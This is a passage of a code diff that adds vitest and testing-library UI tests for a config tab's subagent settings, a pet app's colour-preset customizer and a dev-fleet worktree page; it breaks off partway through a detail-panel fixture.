+    await waitFor(() => {
+      expect(screen.getAllByText('read-only config')).toHaveLength(2)
+    })
+    // onError also invalidates the config query, so it refetches.
+    await waitFor(() => expect(m.kirocrewConfig).toHaveBeenCalledTimes(2))
+  })
+
+  it('applies defaults for the keys an older config file omits', async () => {
+    const sparse = clone() as Cfg
+    const agent = sparse.agent as Record<string, unknown>
+    delete agent.enforce_denied_commands
+    delete agent.tool_search
+    const session = sparse.session as Record<string, unknown>
+    delete session.pool_size
+    delete session.pool_agent
+    sparse.default_agent = ''
+    seed(sparse)
+
+    await renderTab()
+    expect(num('Pool Size').value).toBe('0')
+    expect(toggleFor('MCP Tool Search')).toHaveTextContent('on')
+    expect(optionIn('Enforce Denied Commands', 'all')).toHaveAttribute('aria-selected', 'true')
+    // With no default agent configured, the empty pool-agent option falls back
+    // to a generic placeholder instead of naming one.
+    expect(optionIn('Pool Agent', '(default agent)')).toBeInTheDocument()
+  })
+
+  it('renders the warm pool card for a provider that advertises the capability', async () => {
+    await renderTab()
+    // The active ACP adapter sets capabilities.warmPool, so the card is present
+    // and owns the only Pool Size row on the page.
+    expect(screen.getByText('Warm Pool')).toBeInTheDocument()
+    expect(screen.getAllByRole('spinbutton', { name: 'Pool Size' })).toHaveLength(1)
+  })
+})
+
+// ── SubagentSettings ─────────────────────────────────────────────────────
+describe('KiroCrewCfgTab — subagent settings', () => {
+  const saveBtn = () => screen.getByRole('button', { name: 'Save' })
+
+  it('keeps Save disabled until something actually differs', async () => {
+    await renderTab()
+    expect(saveBtn()).toBeDisabled()
+
+    fireEvent.change(num('Max Turns per Subagent'), { target: { value: '120' } })
+    expect(saveBtn()).toBeEnabled()
+
+    fireEvent.change(num('Max Turns per Subagent'), { target: { value: '100' } })
+    expect(saveBtn()).toBeDisabled()
+  })
+
+  it('sends the whole subagent block and confirms', async () => {
+    const m = vi.mocked(api)
+    await renderTab()
+
+    fireEvent.change(num('Max Turns per Subagent'), { target: { value: '150' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Orchestrator Mode' }))
+    fireEvent.click(saveBtn())
+
+    expect(await screen.findByText('Saved')).toBeInTheDocument()
+    expect(m.saveKirocrewConfig).toHaveBeenCalledWith({
+      subagent_max_turns: 150,
+      max_subagents: 3,
+      subagent_auto_max: 16,
+      conductor_skill: true,
+    })
+    // onSaved invalidates the config query.
+    await waitFor(() => expect(m.kirocrewConfig).toHaveBeenCalledTimes(2))
+  })
+
+  it('shows a rejection returned in the payload', async () => {
+    const m = vi.mocked(api)
+    m.saveKirocrewConfig = vi.fn().mockResolvedValue({ error: 'value out of range' })
+
+    await renderTab()
+    fireEvent.change(num('Max Turns per Subagent'), { target: { value: '7' } })
+    fireEvent.click(saveBtn())
+
+    expect(await screen.findByText('value out of range')).toBeInTheDocument()
+    // A rejected save must not refetch as if it had landed.
+    expect(m.kirocrewConfig).toHaveBeenCalledTimes(1)
+  })
+
+  it('shows a thrown save error and re-enables the button', async () => {
+    const m = vi.mocked(api)
+    m.saveKirocrewConfig = vi.fn().mockRejectedValue(new Error('socket hang up'))
+
+    await renderTab()
+    fireEvent.change(num('Max Concurrent Subagents'), { target: { value: '5' } })
+    fireEvent.click(saveBtn())
+
+    expect(await screen.findByText('socket hang up')).toBeInTheDocument()
+    expect(saveBtn()).toBeEnabled()
+  })
+
+  it('stringifies a non-Error thrown by the save call', async () => {
+    const m = vi.mocked(api)
+    m.saveKirocrewConfig = vi.fn().mockRejectedValue('gateway went away')
+
+    await renderTab()
+    fireEvent.change(num('Max Turns per Subagent'), { target: { value: '9' } })
+    fireEvent.click(saveBtn())
+
+    expect(await screen.findByText('gateway went away')).toBeInTheDocument()
+  })
+
+  it('reveals the auto-size ceiling only while concurrency is auto', async () => {
+    await renderTab()
+    expect(screen.queryByRole('spinbutton', { name: 'Auto-Size Max' })).toBeNull()
+
+    fireEvent.change(num('Max Concurrent Subagents'), { target: { value: '0' } })
+    expect(within(rowFor('Max Concurrent Subagents')).getByText('auto')).toBeInTheDocument()
+    expect(num('Auto-Size Max').value).toBe('16')
+
+    fireEvent.change(num('Max Concurrent Subagents'), { target: { value: '4' } })
+    expect(screen.queryByRole('spinbutton', { name: 'Auto-Size Max' })).toBeNull()
+  })
+
+  it('clamps every numeric input to its own bounds', async () => {
+    await renderTab()
+
+    // A blank max-turns collapses to the minimum rather than NaN.
+    fireEvent.change(num('Max Turns per Subagent'), { target: { value: '' } })
+    expect(num('Max Turns per Subagent').value).toBe('1')
+
+    // Negative concurrency floors at 0, which means auto.
+    fireEvent.change(num('Max Concurrent Subagents'), { target: { value: '-3' } })
+    expect(num('Max Concurrent Subagents').value).toBe('0')
+
+    // A blank one lands on auto too.
+    fireEvent.change(num('Max Concurrent Subagents'), { target: { value: '' } })
+    expect(num('Max Concurrent Subagents').value).toBe('0')
+
+    fireEvent.change(num('Auto-Size Max'), { target: { value: '999' } })
+    expect(num('Auto-Size Max').value).toBe('64')
+    fireEvent.change(num('Auto-Size Max'), { target: { value: '' } })
+    expect(num('Auto-Size Max').value).toBe('1')
+  })
+
+  it('resyncs local edits when a fresh config arrives', async () => {
+    const updated = clone()
+    updated.agent.subagent_max_turns = 42
+    updated.agent.conductor_skill = true
+    seed(CFG, updated)
+
+    await renderTab()
+    fireEvent.change(num('Max Turns per Subagent'), { target: { value: '150' } })
+    expect(num('Max Turns per Subagent').value).toBe('150')
+
+    // A patch elsewhere on the page replaces the cached config; the subagent
+    // block must follow the server, discarding the uncommitted 150.
+    fireEvent.click(toggleFor('Auto Update'))
+    await waitFor(() => expect(num('Max Turns per Subagent').value).toBe('42'))
+    expect(screen.getByRole('button', { name: 'Orchestrator Mode' })).toHaveTextContent('Enabled')
+    expect(saveBtn()).toBeDisabled()
+  })
+
+  it('falls back to built-in subagent defaults when the block is absent', async () => {
+    const sparse = clone() as Cfg
+    const agent = sparse.agent as Record<string, unknown>
+    delete agent.subagent_max_turns
+    delete agent.max_subagents
+    delete agent.subagent_auto_max
+    delete agent.conductor_skill
+    seed(sparse)
+
+    await renderTab()
+    expect(num('Max Turns per Subagent').value).toBe('100')
+    expect(num('Max Concurrent Subagents').value).toBe('3')
+    expect(screen.getByRole('button', { name: 'Orchestrator Mode' })).toHaveTextContent('Disabled')
+    expect(saveBtn()).toBeDisabled()
+  })
+})

--- a/website/src/test/ColorCustomizerCoverage.test.tsx
+++ b/website/src/test/ColorCustomizerCoverage.test.tsx
@@ -1,0 +1,405 @@
+/**
+ * Mochi color customizer — first tests for
+ * `apps/mochi/src/renderer/ColorCustomizer.tsx`.
+ *
+ * The panel is the pet's entire recolouring surface (a preset grid plus a manual
+ * per-body-part editor) and had no test at all, so every behaviour below is
+ * pinned here for the first time. Everything it can reach outside itself goes
+ * through one seam (`api` in `mochiApi`), so that module is the single mock; the
+ * colour maths (`colorCustomizer`, `catPresets`, `builtInCatPresets`) is pure and
+ * is exercised for real rather than stubbed, because the previews ARE its output
+ * and a stub would prove nothing about what the user sees.
+ *
+ * The behaviours worth pinning are the ones a user can be lied to by:
+ *
+ *  - what is read on mount actually reaches the previews (a saved map recolours
+ *    the "Current" thumbnail and pre-fills each colour input), and an EMPTY read
+ *    leaves the art alone rather than blanking it;
+ *  - a preset click, an Enter/Space activation and a manual colour edit each
+ *    persist through `gallerySetColorMap`, and an edit drops the active mark
+ *    because the result is no longer that preset;
+ *  - the save form's guard (a whitespace-only name writes nothing) and the two
+ *    ways out of it, which differ on whether the typed name survives;
+ *  - delete, which must persist the SHORTER list and must not double as a click
+ *    on the card it sits inside.
+ *
+ * No fake timers: the panel has no timers of its own. The one async read is
+ * flushed explicitly after mount so nothing here depends on elapsed time.
+ */
+import { describe, it, expect, beforeEach, vi } from 'vitest'
+import { act, fireEvent, render, screen, waitFor, within } from '@testing-library/react'
+
+import type { CatPreset } from '../apps/mochi/src/shared/catPresets'
+import type { ColorMap } from '../apps/mochi/src/shared/colorCustomizer'
+
+const presetsGetColorMap = vi.fn<(avatarId: string) => Promise<ColorMap>>()
+const presetsLoadCustom = vi.fn<() => Promise<CatPreset[]>>()
+const presetsSaveCustom = vi.fn<(presets: CatPreset[]) => Promise<void>>()
+const gallerySetColorMap = vi.fn<(avatarId: string, map: ColorMap) => Promise<void>>()
+
+vi.mock('../apps/mochi/src/mochiApi', () => ({
+  api: { presetsGetColorMap, presetsLoadCustom, presetsSaveCustom, gallerySetColorMap },
+}))
+
+const { ColorCustomizerPanel } = await import('../apps/mochi/src/renderer/ColorCustomizer')
+const { BUILT_IN_CAT_PRESETS } = await import('../apps/mochi/src/shared/builtInCatPresets')
+const { applySvgColorMap } = await import('../apps/mochi/src/shared/colorCustomizer')
+const { toDataUri } = await import('../apps/mochi/src/renderer/animationResolver')
+
+/* ── fixtures ─────────────────────────────────────────────────── */
+
+/**
+ * Idle art with four distinct source colours: three that the panel has a body
+ * part label for (one of them a "dark" colour, which the highlight map fades
+ * differently) and one it does not, so the unlabelled fallback is exercised too.
+ */
+const IDLE_SVG = [
+  '<svg xmlns="http://www.w3.org/2000/svg" width="64" height="64">',
+  '<path fill="#F9A85F" d="M0 0h10v10H0z" />',
+  '<path fill="#FCD9B3" d="M2 2h4v4H2z" />',
+  '<path stroke="#522210" d="M0 0L10 10" />',
+  '<path fill="#123456" d="M8 8h2v2H8z" />',
+  '</svg>',
+].join('')
+
+/** The ten built-in cards, by the English display name each one renders. */
+const BUILT_IN_NAMES = [
+  'Orange Tabby', 'Tuxedo', 'Calico', 'Russian Blue', 'Siamese',
+  'British Shorthair', 'White', 'Black', 'Tabby', 'Ragdoll',
+]
+
+/** A preset as `presetsLoadCustom` hands one back from disk. */
+function customPreset(over: Partial<CatPreset> = {}): CatPreset {
+  return {
+    id: 'custom-1',
+    name: 'Sunset Kitty',
+    description: '',
+    colorMap: { '#F9A85F': '#FF0000' },
+    swatches: ['#FF0000', '#F9A85F'],
+    builtIn: false,
+    ...over,
+  }
+}
+
+function builtInMap(id: string): ColorMap {
+  const found = BUILT_IN_CAT_PRESETS.find(p => p.id === id)
+  if (!found) throw new Error(`no built-in preset ${id}`)
+  return found.colorMap
+}
+
+/* ── harness ──────────────────────────────────────────────────── */
+
+/** Flush the one mount read (`Promise.all` of two api calls) inside `act`. */
+async function flush(): Promise<void> {
+  await act(async () => { await new Promise(resolve => setTimeout(resolve, 0)) })
+}
+
+async function renderPanel(): Promise<HTMLElement> {
+  const { container } = render(<ColorCustomizerPanel idleSvgContent={IDLE_SVG} />)
+  await flush()
+  return container
+}
+
+/** The card wrapper for a preset, addressed through its preview image. */
+function card(name: string): HTMLElement {
+  const wrapper = screen.getByAltText(name).closest('[role="button"]')
+  if (!wrapper) throw new Error(`no preset card for ${name}`)
+  return wrapper as HTMLElement
+}
+
+/** The manual colour input belonging to one body-part card, by its label. */
+function colorInput(bodyPart: string): HTMLInputElement {
+  const cell = screen.getByAltText(bodyPart).parentElement
+  const input = cell?.querySelector<HTMLInputElement>('input[type="color"]')
+  if (!input) throw new Error(`no colour input for ${bodyPart}`)
+  return input
+}
+
+/** Wait for the save form to have closed itself after a successful write. */
+async function formClosed(): Promise<void> {
+  await waitFor(() => expect(screen.queryByPlaceholderText('Preset name')).toBeNull())
+}
+
+/** The map handed to the most recent `gallerySetColorMap` call. */
+function lastPersistedMap(): ColorMap {
+  const calls = gallerySetColorMap.mock.calls
+  expect(calls.length).toBeGreaterThan(0)
+  return calls[calls.length - 1][1]
+}
+
+beforeEach(() => {
+  vi.clearAllMocks()
+  presetsGetColorMap.mockResolvedValue({})
+  presetsLoadCustom.mockResolvedValue([])
+  presetsSaveCustom.mockResolvedValue(undefined)
+  gallerySetColorMap.mockResolvedValue(undefined)
+})
+
+/* ── mount ────────────────────────────────────────────────────── */
+
+describe('ColorCustomizerPanel — what is on screen after mount', () => {
+  it('renders both sections, all ten built-in presets and one editor per source colour', async () => {
+    const container = await renderPanel()
+
+    expect(screen.getByText('Presets')).toBeTruthy()
+    expect(screen.getByText('Manual')).toBeTruthy()
+    for (const name of BUILT_IN_NAMES) expect(screen.getByAltText(name)).toBeTruthy()
+
+    // The "Current" cell is the combined preview, not a per-part editor.
+    expect(screen.getByAltText('final')).toBeTruthy()
+    expect(screen.getByText('Current')).toBeTruthy()
+
+    // Three labelled parts plus the colour with no label, which shows its hex.
+    expect(screen.getByAltText('Body / Fur')).toBeTruthy()
+    expect(screen.getByAltText('Tummy / Pads')).toBeTruthy()
+    expect(screen.getByAltText('Outlines / Eyes')).toBeTruthy()
+    expect(screen.getByText('#123456')).toBeTruthy()
+    expect(container.querySelectorAll('input[type="color"]')).toHaveLength(4)
+
+    expect(presetsGetColorMap).toHaveBeenCalledWith('default-mochi')
+    expect(presetsLoadCustom).toHaveBeenCalled()
+  })
+
+  it('recolours the preview and pre-fills the inputs from the saved map', async () => {
+    presetsGetColorMap.mockResolvedValue({ '#F9A85F': '#00FF00' })
+    await renderPanel()
+
+    // The combined preview is built from the recoloured art, not the raw art.
+    expect(screen.getByAltText('final').getAttribute('src'))
+      .toBe(toDataUri(applySvgColorMap(IDLE_SVG, { '#F9A85F': '#00FF00' })))
+    expect(colorInput('Body / Fur').value.toLowerCase()).toBe('#00ff00')
+    // An untouched part still shows its own source colour.
+    expect(colorInput('Tummy / Pads').value.toLowerCase()).toBe('#fcd9b3')
+  })
+
+  it('leaves the art alone when the saved map and the custom list are empty', async () => {
+    await renderPanel()
+
+    expect(screen.getByAltText('final').getAttribute('src')).toBe(toDataUri(IDLE_SVG))
+    expect(colorInput('Body / Fur').value.toLowerCase()).toBe('#f9a85f')
+    expect(screen.queryAllByRole('button', { name: 'Delete' })).toHaveLength(0)
+    expect(gallerySetColorMap).not.toHaveBeenCalled()
+  })
+
+  it('shows a stored custom preset with a delete affordance the built-ins lack', async () => {
+    presetsLoadCustom.mockResolvedValue([customPreset()])
+    await renderPanel()
+
+    expect(within(card('Sunset Kitty')).getByRole('button', { name: 'Delete' })).toBeTruthy()
+    expect(within(card('Tuxedo')).queryByRole('button', { name: 'Delete' })).toBeNull()
+  })
+
+  it('previews a colourless custom preset as the unmodified art', async () => {
+    presetsLoadCustom.mockResolvedValue([customPreset({ colorMap: {} })])
+    await renderPanel()
+
+    expect(screen.getByAltText('Sunset Kitty').getAttribute('src')).toBe(toDataUri(IDLE_SVG))
+  })
+})
+
+/* ── applying presets and manual edits ────────────────────────── */
+
+describe('ColorCustomizerPanel — applying a preset', () => {
+  it('marks the clicked preset active and persists its colour map', async () => {
+    await renderPanel()
+
+    fireEvent.click(card('Tuxedo'))
+
+    expect(gallerySetColorMap).toHaveBeenCalledWith('default-mochi', builtInMap('tuxedo'))
+    expect(card('Tuxedo').getAttribute('aria-pressed')).toBe('true')
+    expect(card('Calico').getAttribute('aria-pressed')).toBe('false')
+    // The manual editors follow the preset rather than keeping the source colour.
+    expect(colorInput('Body / Fur').value.toLowerCase())
+      .toBe(String(builtInMap('tuxedo')['#F9A85F']).toLowerCase())
+  })
+
+  it('activates a card from the keyboard with Enter and with Space, and ignores other keys', async () => {
+    await renderPanel()
+
+    fireEvent.keyDown(card('Siamese'), { key: 'Enter' })
+    expect(lastPersistedMap()).toEqual(builtInMap('siamese'))
+    expect(card('Siamese').getAttribute('aria-pressed')).toBe('true')
+
+    fireEvent.keyDown(card('Calico'), { key: ' ' })
+    expect(lastPersistedMap()).toEqual(builtInMap('calico'))
+    expect(card('Calico').getAttribute('aria-pressed')).toBe('true')
+    expect(card('Siamese').getAttribute('aria-pressed')).toBe('false')
+
+    const before = gallerySetColorMap.mock.calls.length
+    fireEvent.keyDown(card('Ragdoll'), { key: 'a' })
+    expect(gallerySetColorMap.mock.calls).toHaveLength(before)
+  })
+
+  it('merges a manual edit into the map and drops the active preset mark', async () => {
+    await renderPanel()
+    fireEvent.click(card('Tuxedo'))
+
+    fireEvent.change(colorInput('Tummy / Pads'), { target: { value: '#010203' } })
+
+    const persisted = lastPersistedMap()
+    expect(persisted['#FCD9B3']).toBe('#010203')
+    // Everything the preset set is still there — the edit is a merge, not a reset.
+    expect(persisted['#F9A85F']).toBe(builtInMap('tuxedo')['#F9A85F'])
+    expect(card('Tuxedo').getAttribute('aria-pressed')).toBe('false')
+    expect(colorInput('Tummy / Pads').value.toLowerCase()).toBe('#010203')
+  })
+
+  it('Reset clears the map, the active mark and the previews', async () => {
+    presetsGetColorMap.mockResolvedValue({ '#F9A85F': '#00FF00' })
+    await renderPanel()
+    fireEvent.click(card('Tuxedo'))
+
+    fireEvent.click(screen.getByRole('button', { name: 'Reset' }))
+    await flush()
+
+    expect(lastPersistedMap()).toEqual({})
+    expect(card('Tuxedo').getAttribute('aria-pressed')).toBe('false')
+    expect(screen.getByAltText('final').getAttribute('src')).toBe(toDataUri(IDLE_SVG))
+    expect(colorInput('Body / Fur').value.toLowerCase()).toBe('#f9a85f')
+  })
+})
+
+/* ── saving a custom preset ───────────────────────────────────── */
+
+describe('ColorCustomizerPanel — saving the current colours as a preset', () => {
+  it('opens the form on demand and writes nothing for a whitespace-only name', async () => {
+    await renderPanel()
+    expect(screen.queryByPlaceholderText('Preset name')).toBeNull()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Save as Preset' }))
+    const nameField = screen.getByPlaceholderText('Preset name')
+    const confirm = screen.getByRole('button', { name: 'Save as Preset' })
+    expect((confirm as HTMLButtonElement).disabled).toBe(true)
+
+    fireEvent.change(nameField, { target: { value: '   ' } })
+    expect((confirm as HTMLButtonElement).disabled).toBe(true)
+
+    fireEvent.keyDown(nameField, { key: 'Enter' })
+    await flush()
+    expect(presetsSaveCustom).not.toHaveBeenCalled()
+    // The form stays open so the name can be corrected.
+    expect(screen.getByPlaceholderText('Preset name')).toBeTruthy()
+  })
+
+  it('saves the edited colours under the typed name and shows the new card', async () => {
+    await renderPanel()
+    fireEvent.change(colorInput('Body / Fur'), { target: { value: '#00ff00' } })
+
+    fireEvent.click(screen.getByRole('button', { name: 'Save as Preset' }))
+    fireEvent.change(screen.getByPlaceholderText('Preset name'), { target: { value: 'Sunset Kitty' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Save as Preset' }))
+    await formClosed()
+    expect(presetsSaveCustom).toHaveBeenCalled()
+
+    const saved = presetsSaveCustom.mock.calls[0][0]
+    expect(saved).toHaveLength(1)
+    expect(saved[0].name).toBe('Sunset Kitty')
+    expect(saved[0].builtIn).toBe(false)
+    expect(saved[0].colorMap).toEqual({ '#F9A85F': '#00ff00' })
+    // One edited colour yields one swatch, and the pad brings it up to two.
+    expect(saved[0].swatches).toHaveLength(2)
+
+    // The preset joins the grid once the form has closed.
+    expect(screen.getByAltText('Sunset Kitty')).toBeTruthy()
+  })
+
+  it('keeps the swatches as they are when two colours already differ', async () => {
+    await renderPanel()
+    fireEvent.change(colorInput('Body / Fur'), { target: { value: '#00ff00' } })
+    fireEvent.change(colorInput('Tummy / Pads'), { target: { value: '#0000ff' } })
+
+    fireEvent.click(screen.getByRole('button', { name: 'Save as Preset' }))
+    fireEvent.change(screen.getByPlaceholderText('Preset name'), { target: { value: 'Two Tone' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Save as Preset' }))
+    await formClosed()
+
+    // Two distinct values already satisfy the 2-swatch floor, so nothing is padded.
+    expect(presetsSaveCustom.mock.calls[0][0][0].swatches).toEqual(['#00ff00', '#0000ff'])
+  })
+
+  it('saves on Enter, and Escape closes the form while keeping the typed name', async () => {
+    await renderPanel()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Save as Preset' }))
+    fireEvent.change(screen.getByPlaceholderText('Preset name'), { target: { value: 'Via Enter' } })
+    fireEvent.keyDown(screen.getByPlaceholderText('Preset name'), { key: 'Enter' })
+    await formClosed()
+    expect(presetsSaveCustom.mock.calls[0][0][0].name).toBe('Via Enter')
+
+    fireEvent.click(screen.getByRole('button', { name: 'Save as Preset' }))
+    fireEvent.change(screen.getByPlaceholderText('Preset name'), { target: { value: 'Abandoned' } })
+    fireEvent.keyDown(screen.getByPlaceholderText('Preset name'), { key: 'Escape' })
+    expect(screen.queryByPlaceholderText('Preset name')).toBeNull()
+    expect(presetsSaveCustom).toHaveBeenCalledTimes(1)
+
+    // Escape only hides the form: reopening still holds what was typed.
+    fireEvent.click(screen.getByRole('button', { name: 'Save as Preset' }))
+    expect((screen.getByPlaceholderText('Preset name') as HTMLInputElement).value).toBe('Abandoned')
+  })
+
+  it('Cancel closes the form and discards the typed name', async () => {
+    await renderPanel()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Save as Preset' }))
+    fireEvent.change(screen.getByPlaceholderText('Preset name'), { target: { value: 'Discarded' } })
+    fireEvent.click(screen.getByRole('button', { name: 'Cancel' }))
+    expect(screen.queryByPlaceholderText('Preset name')).toBeNull()
+
+    fireEvent.click(screen.getByRole('button', { name: 'Save as Preset' }))
+    expect((screen.getByPlaceholderText('Preset name') as HTMLInputElement).value).toBe('')
+    expect(presetsSaveCustom).not.toHaveBeenCalled()
+  })
+})
+
+/* ── deleting a custom preset ─────────────────────────────────── */
+
+describe('ColorCustomizerPanel — deleting a custom preset', () => {
+  it('persists the shorter list and does not also apply the preset it sat on', async () => {
+    presetsLoadCustom.mockResolvedValue([customPreset()])
+    await renderPanel()
+
+    fireEvent.click(within(card('Sunset Kitty')).getByRole('button', { name: 'Delete' }))
+    await waitFor(() => expect(presetsSaveCustom).toHaveBeenCalledWith([]))
+
+    expect(screen.queryByAltText('Sunset Kitty')).toBeNull()
+    // The card's own click handler must not have fired through the delete button.
+    expect(gallerySetColorMap).not.toHaveBeenCalled()
+  })
+
+  it('keeps the active mark when a DIFFERENT preset is deleted', async () => {
+    presetsLoadCustom.mockResolvedValue([
+      customPreset(),
+      customPreset({ id: 'custom-2', name: 'Ocean Kitty', colorMap: { '#F9A85F': '#0000FF' } }),
+    ])
+    await renderPanel()
+
+    fireEvent.click(card('Sunset Kitty'))
+    expect(card('Sunset Kitty').getAttribute('aria-pressed')).toBe('true')
+
+    fireEvent.click(within(card('Ocean Kitty')).getByRole('button', { name: 'Delete' }))
+    await waitFor(() => expect(presetsSaveCustom).toHaveBeenCalled())
+
+    const remaining = presetsSaveCustom.mock.calls[0][0]
+    expect(remaining.map(p => p.id)).toEqual(['custom-1'])
+    expect(screen.queryByAltText('Ocean Kitty')).toBeNull()
+    expect(card('Sunset Kitty').getAttribute('aria-pressed')).toBe('true')
+  })
+
+  it('clears the active mark when the ACTIVE preset is deleted', async () => {
+    presetsLoadCustom.mockResolvedValue([customPreset()])
+    await renderPanel()
+
+    fireEvent.click(card('Sunset Kitty'))
+    expect(card('Sunset Kitty').getAttribute('aria-pressed')).toBe('true')
+
+    fireEvent.click(within(card('Sunset Kitty')).getByRole('button', { name: 'Delete' }))
+    await waitFor(() => expect(screen.queryByAltText('Sunset Kitty')).toBeNull())
+
+    for (const name of BUILT_IN_NAMES) {
+      expect(card(name).getAttribute('aria-pressed')).toBe('false')
+    }
+    // The colours the deleted preset applied are still in effect — delete removes
+    // the entry, not the look.
+    expect(colorInput('Body / Fur').value.toLowerCase()).toBe('#ff0000')
+  })
+})

--- a/website/src/test/DevFleetPageCoverage.test.tsx
+++ b/website/src/test/DevFleetPageCoverage.test.tsx
@@ -1,0 +1,989 @@
+/**
+ * DevFleetPage — coverage for the interaction paths the smoke suite leaves
+ * cold: row-action side effects (pod up/down/restart/open, rebase, remove),
+ * the detail panel's rich payload, sync/provision poll terminal states, the
+ * prune failure branches, the make-live error banner, and the small render
+ * helpers (relative time buckets, unknown PR state, legacy toggle).
+ *
+ * Every test drives the real component through fetch, so a route that stops
+ * being called (or starts being called with the wrong shape) fails here.
+ */
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'
+import { screen, waitFor, fireEvent, within } from '@testing-library/react'
+import { renderWithProviders } from './helpers'
+
+import DevFleetPage from '../pages/DevFleetPage'
+
+type Body = Record<string, unknown> | unknown[] | null
+type RouteHandler = (u: string, opts?: RequestInit) => Response | Promise<Response> | null
+
+const res = (body: Body, status = 200) => new Response(JSON.stringify(body), { status })
+
+/**
+ * Install a fetch double. `handler` gets first refusal on every URL; returning
+ * null falls through to the shared /fleet + /disk defaults, which every test
+ * needs and none of them is about.
+ */
+function installFetch(fleet: Body, handler?: RouteHandler) {
+  return vi.spyOn(globalThis, 'fetch').mockImplementation((url, opts) => {
+    const u = typeof url === 'string' ? url : url instanceof URL ? url.toString() : (url as Request).url
+    const custom = handler?.(u, opts as RequestInit | undefined)
+    if (custom) return Promise.resolve(custom)
+    if (u.includes('/fleet')) return Promise.resolve(res(fleet))
+    if (u.includes('/disk')) return Promise.resolve(res({ total_mb: 51200 }))
+    return Promise.resolve(res({}))
+  })
+}
+
+const isPost = (opts?: RequestInit) => String(opts?.method || '').toUpperCase() === 'POST'
+const nowSec = () => Math.floor(Date.now() / 1000)
+
+const MAIN_ROW = { name: 'main', is_main: true, running: false, has_dist: true, behind: 0, branch: 'main', is_live: true }
+
+/** A non-main row that is built, idle, and eligible for every row action. */
+const readyRow = (over: Record<string, unknown> = {}) => ({
+  name: 'wt-a', is_main: false, running: false, has_dist: true, behind: 0,
+  branch: 'feat/a', path: '/w/wt-a', last_updated_at: nowSec(), ...over,
+})
+
+const fleetOf = (...worktrees: Record<string, unknown>[]) => ({ base_branch: 'main', worktrees })
+
+function renderPage() {
+  return renderWithProviders(<DevFleetPage />, { route: '/dev-fleet' })
+}
+
+/** Wait for the first paint of the fleet table. */
+async function waitForRow(name: string) {
+  await waitFor(() => expect(screen.getByText(name)).toBeInTheDocument(), { timeout: 4000 })
+}
+
+/** Open a non-main row's portaled actions menu and return it. */
+async function openRowMenu() {
+  fireEvent.click(screen.getByLabelText('More actions'))
+  return within(await screen.findByRole('menu'))
+}
+
+describe('DevFleetPage row rendering helpers', () => {
+  beforeEach(() => { vi.restoreAllMocks() })
+
+  it('renders each relative-time bucket for the UPDATED column', async () => {
+    // relTime() has four buckets past "just now"; the row strips the " ago"
+    // suffix, so the column reads 5m / 3d / 2mo.
+    installFetch(fleetOf(
+      MAIN_ROW,
+      readyRow({ name: 'wt-mins', path: '/w/1', last_updated_at: nowSec() - 300 }),
+      readyRow({ name: 'wt-days', path: '/w/2', last_updated_at: nowSec() - 3 * 86400 }),
+      readyRow({ name: 'wt-months', path: '/w/3', last_updated_at: nowSec() - 70 * 86400 }),
+    ))
+    renderPage()
+    await waitForRow('wt-mins')
+    expect(screen.getByText('5m')).toBeInTheDocument()
+    expect(screen.getByText('3d')).toBeInTheDocument()
+    expect(screen.getByText('2mo')).toBeInTheDocument()
+  })
+
+  it('renders an ellipsis PR pill for a state the UI does not model, and still sorts', async () => {
+    // Two non-main rows force the comparator to run, so prRank sees the
+    // unknown state too — it must rank with the PR-less rows rather than throw.
+    installFetch(fleetOf(
+      readyRow({ name: 'wt-open', path: '/w/1', pr: { number: 1, state: 'OPEN', url: 'https://example.test/pr/1' } }),
+      readyRow({ name: 'wt-weird', path: '/w/2', pr: { number: 2, state: 'SOMETHING_NEW', url: 'https://example.test/pr/2' } }),
+    ))
+    renderPage()
+    await waitForRow('wt-weird')
+    expect(screen.getByText('\u2026')).toBeInTheDocument()
+    expect(screen.getByText('open')).toBeInTheDocument()
+  })
+
+  it('hides legacy worktrees behind a toggle that reveals them on click', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow({ name: 'wt-old', path: '/w/old', legacy: true })))
+    renderPage()
+    await waitFor(() => expect(screen.getByText(/legacy worktrees hidden/)).toBeInTheDocument(), { timeout: 4000 })
+    expect(screen.queryByText('wt-old')).toBeNull()
+    fireEvent.click(screen.getByText(/legacy worktrees hidden/))
+    expect(screen.getByText('wt-old')).toBeInTheDocument()
+    expect(screen.getByText(/Hide 1 legacy worktrees/)).toBeInTheDocument()
+  })
+
+  it('offers Open plus the pod lifecycle menu items for a running, built worktree', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow({ running: true, health: 200 })))
+    renderPage()
+    await waitForRow('wt-a')
+    expect(screen.getByText('Open')).toBeInTheDocument()
+    const menu = await openRowMenu()
+    expect(menu.getByText('Restart pod')).toBeInTheDocument()
+    expect(menu.getByText('Stop pod')).toBeInTheDocument()
+    // Spin up is the mutually exclusive one — the pod is already running.
+    expect(menu.queryByText('Spin up pod')).toBeNull()
+  })
+})
+
+describe('DevFleetPage portaled popovers', () => {
+  beforeEach(() => { vi.restoreAllMocks() })
+
+  it('closes the row menu on a scroll, because its position is fixed', async () => {
+    installFetch(fleetOf(MAIN_ROW, readyRow()))
+    renderPage()
+    await waitForRow('wt-a')
+    fireEvent.click(screen.getByLabelText('More actions'))
+    expect(await screen.findByRole('menu')).toBeInTheDocument()
+    fireEvent.scroll(window)
+    await waitFor(() => expect(screen.queryByRole('menu')).toBeNull())
+  })
+
+  it('closes the confirm popover on a resize and on Cancel', async () => {
+    installFetch(fleetOf(MAIN_ROW))
+    renderPage()
+    await waitFor(() => expect(screen.getByText('Pull+Build')).toBeInTheDocument(), { timeout: 4000 })
+    const trigger = screen.getByText('Pull+Build').closest('button') as HTMLButtonElement
+
+    fireEvent.click(trigger)
+    expect(await screen.findByRole('dialog', { name: 'Pull + Build main' })).toBeInTheDocument()
+    fireEvent.resize(window)
+    await waitFor(() => expect(screen.queryByRole('dialog')).toBeNull())
+
+    fireEvent.click(trigger)
+    const pop = await screen.findByRole('dialog', { name: 'Pull + Build main' })
+    fireEvent.click(within(pop).getByText('Cancel'))
+    await waitFor(() => expect(screen.queryByRole('dialog')).toBeNull())
+  })
+})
+
+describe('DevFleetPage detail panel', () => {
+  beforeEach(() => { vi.restoreAllMocks() })
+
+  const DETAIL = {
+    branch: 'feat/a',
+    design_docs: ['docs/rfc-a.md', 'docs/rfc-b.md'],
